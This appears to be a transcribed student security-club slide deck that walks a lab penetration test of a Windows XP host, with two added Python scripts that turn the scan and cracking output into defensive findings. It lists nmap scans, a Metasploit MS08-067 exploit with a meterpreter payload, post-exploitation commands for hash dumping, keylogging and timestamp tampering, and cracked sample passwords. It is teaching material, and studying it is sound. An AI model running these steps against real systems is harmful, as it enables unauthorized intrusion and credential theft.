Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair.

1 Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair

2 Tonight
Our first “interactive” meeting
Introduction to Backtrack
A mini penetration test: Scenario, Outline, Enumeration, Exploitation, Post Exploitation, Exercise
Summary
Resources

3 Scenario
Company X wants you to test if their internal boxes are secure. They have given you a sample box with the default security settings the company uses for all user workstations. You take it back to the lab and begin to test it...

4 Outline
Enumeration: OS, services, versions, filters
Exploitation: exploit a known vulnerability, get shell access to the box
Post Exploitation: shell is just the beginning... ;) Hashes, SSH / GPG keys, pivot

5 Enumeration
'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org
nmap [Scan Type(s)] [Options] {target specification}
Scan Types: -sS, SYN scan; -sT, Connect scan; -sA, ACK scan; …
Options: -O, OS detection; -sV, service/version detection; -v, verbose; …

6 … Enumeration
nmap 192.168.1.1
  Default scan: SYN scan of the top 1000 ports
nmap -v -sV -O 192.168.1.1 -p 1-65535
  Verbose, service versions, OS detection, ports 1 through 65535
nmap -PN --script=smb* -sV -O 192.168.1.1
  Don't ping first, run all smb* scripts, service versions, OS detection

7 Nmap Output
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
...
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1...
Host script results:
| smb-os-discovery: Windows 2000
| smb-enum-domains:
|   Domain: MITCHELL-32D5C5
|   |_ SID: S-1-5-21-606747145-1647877149-725345543
|   |_ Users: add, Administrator, Guest, s3cr3tus3r, sally...
|   Anonymous shares: IPC$
|_  Restricted shares: ADMIN$, C$...
| smb-check-vulns:
|_  MS08-067: VULNERABLE
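The output above is what a scanner produces; what a defender needs is the same information as a list of things to fix. The following parser is an added example (not part of the slide deck) that reads nmap's normal-output text, pulls out open ports, the OS guess, the anonymously enumerated user list and the smb-check-vulns verdict, and turns them into triage items. The sample text is the slide 7 output re-typed as a constructed string; no network access is involved.

```python
"""Parse nmap normal-output text into findings a defender can triage.

Added example, not from the slides. The sample below is the slide 7 output
re-typed as a constructed string; nothing here touches the network.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: the nmap output shown on slide 7, as plain text.
SAMPLE_OUTPUT = """\
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\\winnt\\system32\\Mstask.exe)
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1
Host script results:
| smb-os-discovery: Windows 2000
| smb-enum-domains:
|   Domain: MITCHELL-32D5C5
|   |_ SID: S-1-5-21-606747145-1647877149-725345543
|   |_ Users: add, Administrator, Guest, s3cr3tus3r, sally
|   Anonymous shares: IPC$
|_  Restricted shares: ADMIN$, C$
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

# One regex per line shape we care about in nmap's normal output.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
VULN_RE = re.compile(r"^\|_?\s+(MS\d{2}-\d{3}):\s+(\S+)")
USERS_RE = re.compile(r"Users:\s*(.*)$")
OS_RE = re.compile(r"^OS details:\s*(.*)$")


@dataclass
class HostReport:
    ports: list = field(default_factory=list)   # (port, proto, state, service, version)
    os_guess: str = ""
    users: list = field(default_factory=list)   # accounts listed by smb-enum-domains
    vulns: dict = field(default_factory=dict)   # e.g. "MS08-067" -> "VULNERABLE"


def parse_nmap(text):
    """Walk the output line by line and fill a HostReport."""
    report = HostReport()
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            report.ports.append((int(port), proto, state, service, version or ""))
            continue
        m = OS_RE.match(line)
        if m:
            report.os_guess = m.group(1)
            continue
        m = USERS_RE.search(line)
        if m and line.startswith("|"):   # only inside NSE script results
            report.users = [u.strip() for u in m.group(1).split(",") if u.strip()]
            continue
        m = VULN_RE.match(line)
        if m:
            report.vulns[m.group(1)] = m.group(2)
    return report


def findings(report):
    """Turn the parsed report into the items a blue team would act on."""
    items = []
    for port, proto, state, service, _ in report.ports:
        if state == "open" and service in ("msrpc", "netbios-ssn", "microsoft-ds"):
            items.append(f"SMB/RPC exposed on {port}/{proto}: restrict with host firewall")
    for vuln, status in report.vulns.items():
        if status == "VULNERABLE":
            items.append(f"{vuln} unpatched: apply the vendor patch")
    if "Guest" in report.users:
        items.append("Guest account visible over null session: disable it")
    if report.users:
        items.append("user list enumerable anonymously: restrict null sessions")
    return items


if __name__ == "__main__":
    for item in findings(parse_nmap(SAMPLE_OUTPUT)):
        print("-", item)
```

Running the file prints six items for the slide 7 host: three exposed SMB/RPC ports, the unpatched MS08-067, the enumerable Guest account and the anonymous user listing. The same parser runs unchanged over a saved `nmap -oN` file for a whole subnet, which is how the check in the scenario becomes a repeatable baseline rather than a one-off demo.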

8 Exploitation
Metasploit – Penetration Testing Framework: tools, libraries, modules, and user interfaces
# msfconsole
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

9 Post Exploitation
Gather useful information: SSH & GPG keys, hashes, etc...
Pivot
meterpreter > hashdump
meterpreter > sysinfo
meterpreter > keyscan_(start | stop | dump)
meterpreter > timestomp
meterpreter > migrate
meterpreter > shell

10 … Post Exploitation
We dumped the hashes... now what?
Pass the hash
Crack the hash
John the Ripper: a tool to find weak passwords of your users
john [options] password-files
--wordlist
--users, --groups
--session, --restore

11 … Post Exploitation
john --wordlist=/.../password.lst /tmp/hashes.txt
Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])
ABC123           (sally)
SECRET           (s3cr3tus3r)
                 (Guest)
BASKETB          (webmaster:1)
ALL              (webmaster:2)
ADMIN1           (Administrator)
guesses: 5  time: 0:00:00:00 100%  c/s: 25730  trying: SKIDOO - ZHONGGU
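Two things in the john output above deserve a closer look from the defender's side: every password is reported in upper case, and "webmaster" appears twice as "webmaster:1" and "webmaster:2". Both are symptoms of the LM hash format (the "NT LM DES" in the Loaded line), which upper-cases the password, pads or truncates it to 14 bytes and hashes each 7-byte half separately, so BASKETBALL is cracked as BASKETB and ALL. The script below is an added example, not part of the deck: it parses the cracked lines, rejoins the halves, shows the LM normalization for a given password, and produces the reset list and the "disable LM hash storage" finding that would go in the report. The sample output is the slide 11 text re-typed as a constructed string; the DES step itself is not implemented, only the normalization that makes the halves visible.

```python
"""Audit john output for weak credentials and rejoin LM halves.

Added example, not from the slides. SAMPLE_JOHN is the slide 11 output as a
constructed string. lm_halves() mirrors LM normalization only (uppercase,
pad/truncate to 14 bytes, split 7+7); it does not compute the DES hash.
"""
import re

# Constructed sample: the john session shown on slide 11.
SAMPLE_JOHN = """\
Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])
ABC123           (sally)
SECRET           (s3cr3tus3r)
                 (Guest)
BASKETB          (webmaster:1)
ALL              (webmaster:2)
ADMIN1           (Administrator)
guesses: 5  time: 0:00:00:00 100%  c/s: 25730  trying: SKIDOO - ZHONGGU
"""

# "Loaded N password hashes ... (FORMAT [impl])" -> FORMAT
FORMAT_RE = re.compile(r"^Loaded \d+ password hashes.*\((.*?) \[")
# "PASSWORD   (user)" or "PASSWORD   (user:1)" / "(user:2)" for LM halves
CRACKED_RE = re.compile(r"^(.*?)\s*\((\S+?)(?::([12]))?\)\s*$")


def parse_john(text):
    """Return (hash_format, {user: password}); LM halves are rejoined."""
    fmt = ""
    halves = {}   # user -> [first half, second half]
    creds = {}
    for line in text.splitlines():
        m = FORMAT_RE.match(line)
        if m:
            fmt = m.group(1)
            continue
        m = CRACKED_RE.match(line)
        if not m:
            continue
        password, user, half = m.groups()
        if half:
            halves.setdefault(user, ["", ""])[int(half) - 1] = password
        else:
            creds[user] = password
    for user, (first, second) in halves.items():
        creds[user] = first + second
    return fmt, creds


def lm_halves(password):
    """LM normalization: uppercase, 14-byte pad/truncate, split into 7+7."""
    raw = password.upper().encode("latin-1", "replace")[:14].ljust(14, b"\0")
    return (raw[:7].rstrip(b"\0").decode(), raw[7:].rstrip(b"\0").decode())


def weak_accounts(creds, lm_stored, min_len=8):
    """Map each cracked account to the reasons it needs attention."""
    report = {}
    for user, pw in creds.items():
        reasons = ["cracked by wordlist: force a reset"]
        if pw == "":
            reasons.append("empty password")
        elif len(pw) < min_len:
            reasons.append(f"shorter than {min_len} characters")
        if lm_stored and pw:
            reasons.append("LM hash stored: case lost, halves cracked independently; disable LM storage")
        report[user] = reasons
    return report


if __name__ == "__main__":
    fmt, creds = parse_john(SAMPLE_JOHN)
    print("hash format:", fmt, "| LM halves of 'basketball':", lm_halves("basketball"))
    for user, reasons in weak_accounts(creds, lm_stored="LM" in fmt).items():
        print(f"{user}: " + "; ".join(reasons))
```

The "LM" substring in the Loaded line is what drives the LM finding; on a box that stores only NT hashes the same audit still lists the cracked accounts but drops that recommendation. Note that john's own `guesses: 5` counter and the six cracked lines differ by the empty Guest password, which john reports but does not count as a guess; the parser treats it as a finding in its own right.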

12 So... let's get started
Boot up to your Backtrack CD
passwd
/etc/init.d/networking start
startx
Follow along... let's pwn this box :)

13 Summary
Clearly... Company X's default user workstations need some work.
Now let's do the paperwork!... just joking ;)
Hopefully this gives everyone a hands-on introduction to Backtrack, some essential tools, and the attacker's mindset & process.
We want feedback, please!!!! Feedback will steer this organization!!!!

14 Resources
utdcsg.org
Forums - please register!
IRC - irc.oftc.net, #utdcsg
Email - info@utdcsg.org
Nmap - nmap.org/5/
Metasploit - metasploit.com/
John the Ripper - openwall.com/john/

15 Thanks
Next meeting: March 24th, 8:30, ECSS 2.306
Cracking WPA
ARP spoofing (traffic redirection, password sniffing)
